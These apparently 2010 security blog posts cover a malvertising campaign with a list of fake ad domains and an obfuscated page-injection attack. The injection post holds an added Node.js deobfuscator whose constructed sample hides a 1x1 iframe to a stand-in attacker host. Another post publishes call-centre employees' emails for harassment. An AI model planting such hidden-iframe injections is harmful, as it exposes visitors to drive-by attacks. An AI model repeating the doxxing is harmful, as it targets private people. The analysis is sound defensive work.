Friday, 5 February 2010

More fake ad networks

The German news site Handelsblatt was recently the victim of a malvertising campaign:

02.02.2010 Handelsblatt malware on Web site

Update: Infection banners confirmed!

The S-CERT was able to reproduce the infection in its test laboratory on the IHT website. Infection occurs through an advertising banner, which comes from "Doubleclick.net". This in turn includes advertisements from the domain "muentely.com" inserted into the Handelsblatt page. The latter site has obviously been manipulated and contains malicious JavaScript code.

Further investigations in the S-CERT test laboratory have confirmed that a PDF vulnerability, among others, is used to spread the malware. The studies also show that, as an alternative to this vulnerability, attempts are made to exploit further gaps with appropriate attack code in order to install malware onto vulnerable PCs.

According to the S-CERT's investigations, the malware with which accessing PCs eventually become infected is so-called scareware: users are informed, by the insertion of appropriate dialogs, that their PC is extensively infected with malware. To remove this malware, an appropriate protective software is offered for purchase. To give emphasis to the malware message, the scareware ensures that no new applications can be started on infected PCs. Relevant information from users may also indicate an infection.

The malware campaign was running via Doubleclick and Nuggad.net, redirecting through a bunch of domains that look like ad agencies but aren't, before ending up at a server in Panama.

The fake ad agencies are in the 213.163.75.x range, all recently registered through BIZCN.COM in China, a fairly well known black hat registrar.

Note that while the domains appear to be fake, the registration data may include the details of innocent third parties, so I have not published it here. I would recommend avoiding doing business with them unless you can absolutely verify their credentials.

  • Synopsystd.com
  • Namdoline.com
  • Quintat.com
  • Bradfortnd.com
  • Ealana.com
  • Rovitalt.com
  • Favorti.com
  • Muentely.com
  • Briarmod.com
  • Deltamsc.com
  • Jessiereet.com
  • Startrailrs.com
  • Connata.com
  • Vehiced.com
  • Essiell.com
  • Holdrism.com
  • Bellwaynetworks.com
  • Forlifemedia.com
  • Revoltechmarketing.com
  • Hickoryhs.com
  • Ingramctc.com
  • Luxortd.com
  • Morrelmedia.com
  • Gappion.com
  • Savoyee.com
  • Goldbaynetwork.com


Thursday, 4 February 2010

"Hello, this is Icon calling on behalf of BT.."

The phone rings from an undisclosed international number.. an automated voice says "Hello, this is Icon calling on behalf of BT.." and it then goes on to explain that there's nobody to talk to me and I should call back on 0800 980 0127 to unsubscribe. Except of course that I'm bloody on TPS.

So who are they? Icon Communications Centers are based in Prague and have a website at www.icon-cc.com (no, I'm not giving them a link). In fact, the crummy job is advertised right here. OK, I say crummy.. the good thing is that Prague is a very nice place, but you probably won't see too much of it in a call centre.

In the important spirit of pissing cold callers off, here are a couple of contact email addresses you can use to tell them where to go: helen.hickin@icon-cc.com and moses.velasco@icon-cc.com.

Enjoy.


Sergey Ryabov / director@climbing-games.com strikes again

There's a somewhat unusual spate of injection attacks doing the rounds: code is being injected into the middle of victim pages through an unknown flaw, starting with document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D and then going on for a bit. Deobfuscating the code actually leads to a second layer of obfuscation, but once that is decoded it becomes clearer.

The injected code points to itsallbreaksoft.net

This then bounces through paymoneysystem.info/in.cgi?michaeleknowlton before hitting a seemingly random PPC search engine site hosted on 95.211.27.154, for example sdeh.net/iframe.html. Sophos have an excellent write-up of the anatomy of the injection attack here, and it's pretty clear that somebody is ripping somebody else off for PPC traffic.. it's hard to say who the victims actually are.

The domains itsallbreaksoft.net and paymoneysystem.info belong to the same person; these are interesting because of the registration details:

Nexton Limited
Ryabov Sergey (director@climbing-games.com)
+79219270961
Fax: +79219270961
Scherbakova st., 6-38
Saint-Petersburg, 197375
RU

These contact details are very well known for very bad things. Incidentally, the registrar is ruler-domains.com, also an enterprise registered to "Sergey Ryabov" (if that's a real person).

It's all kind of strange as there doesn't appear to be a malware payload, which is good. But because of the way click arbitrage works, finding the real victims and villains is tricky, although interested researchers may want to have a poke around.
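As an added example (not code from the original post, and not the real payload), here is a small Node.js script that statically peels the document.write(unescape('...')) layers described above and lists the URLs that fall out, so a suspicious page can be checked without ever executing the injected script. The sample snippet is constructed: only its leading percent-encoded bytes match the prefix quoted in the post; the hidden iframe, the host attacker.example and the assumption that the second obfuscation layer is also plain percent-encoding are mine.

```javascript
// Added example, not code from the original post. Statically peels the
// document.write(unescape('...')) obfuscation layers described above so a
// suspicious page can be inspected without running the injected script.
// Runs under Node.js with no dependencies.

// Percent-encode every character (%XX), the way these injected snippets are
// built. Used here only to construct the sample input.
function pct(s) {
  return Array.from(s, c =>
    '%' + c.charCodeAt(0).toString(16).toUpperCase().padStart(2, '0')).join('');
}

// Decode %XX and %uXXXX exactly as the legacy JavaScript unescape() does.
// decodeURIComponent() is not a substitute: it throws on non-UTF-8 byte
// sequences and does not understand %uXXXX.
function jsUnescape(s) {
  return s
    .replace(/%u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/%([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Return the string literal passed to every unescape('...') / unescape("...")
// call found in a piece of code (a simple regex; no JavaScript parser needed).
function unescapeArgs(code) {
  const re = /unescape\(\s*(['"])((?:\\.|(?!\1).)*)\1\s*\)/g;
  const args = [];
  let m;
  while ((m = re.exec(code)) !== null) args.push(m[2]);
  return args;
}

// Peel layers: decode every unescape() argument, then look for further
// unescape() calls in the decoded text, up to maxDepth times. Every decoded
// layer is returned so an analyst can read what the page would have written.
function peelLayers(code, maxDepth = 5) {
  const layers = [];
  let current = code;
  for (let depth = 0; depth < maxDepth; depth++) {
    const args = unescapeArgs(current);
    if (args.length === 0) break;
    current = args.map(jsUnescape).join('\n');
    layers.push(current);
  }
  return layers;
}

// Collect the distinct URLs mentioned in the decoded layers: these are the
// hosts a defender would block or hunt for in proxy logs.
function extractUrls(text) {
  const re = /(?:https?:)?\/\/[a-z0-9.-]+\.[a-z]{2,}(?:\/[^\s'"<>]*)?/gi;
  return Array.from(new Set(text.match(re) || []));
}

function analyseInjection(code) {
  const layers = peelLayers(code);
  return { layerCount: layers.length, layers, urls: extractUrls(layers.join('\n')) };
}

// --- Constructed sample (NOT the real payload) ---
// Innermost layer: a hidden iframe to a placeholder host. attacker.example is
// a placeholder, not one of the domains named in the post.
const INNER_PAYLOAD =
  '<iframe src="http://attacker.example/in.cgi?demo" width=1 height=1></iframe>';
// Middle layer: what the first unescape() yields. It starts with
// "<script language=" and carries a second percent-encoded layer (my
// assumption about the second layer's form).
const MIDDLE_LAYER =
  '<script language="javascript">document.write(unescape(\'' +
  pct(INNER_PAYLOAD) + '\'))</script>';
// Outer layer: the line as it would appear injected into a victim page. Its
// leading bytes are exactly the %3C%73%63%72%69%70%74... prefix quoted above.
const SAMPLE_INJECTION = "document.write(unescape('" + pct(MIDDLE_LAYER) + "'));";

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(analyseInjection(SAMPLE_INJECTION), null, 2));
}
```

Run it with `node` to see both decoded layers and the extracted URL; to check a real page, feed the injected line into analyseInjection() instead of SAMPLE_INJECTION. The decoder deliberately reimplements unescape() rather than evaluating anything, so a layer built to exploit the analyst's own browser does no harm here.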


Using Google Images to fight fraud

A great post from the guys at F-Secure about how an employee used Google Images to stop being ripped off. Probably a good tip to stop getting defrauded at auction sites.


Tuesday, 2 February 2010

Pathetic

A multibillion dollar company operated by a bunch of f*cking amateurs.

In particular.. the bit that says "We are building a migration tool", but for some unfathomable reason we have decided to kick off this change before it's ready. Sure, Blogger is a free platform and I could always ask for my money back.

Another favourite is: "only .5% of active blogs are published via FTP".. and the reason for this is that for the past couple of years Blogger's FTP service has become increasingly unreliable for no particular reason.

Unfortunately, anyone who has had business dealings with Google that involve real money will know that the f*ck-you attitude to customer service is very much ingrained in Google. To a certain extent, being jerked around when you are not paying for the service is one thing.. but business partners in things like advertising, YouTube and enterprise applications also suffer the same thing.

Yes, Google is still often awesome. But sometimes, like this time, it's just pathetic.
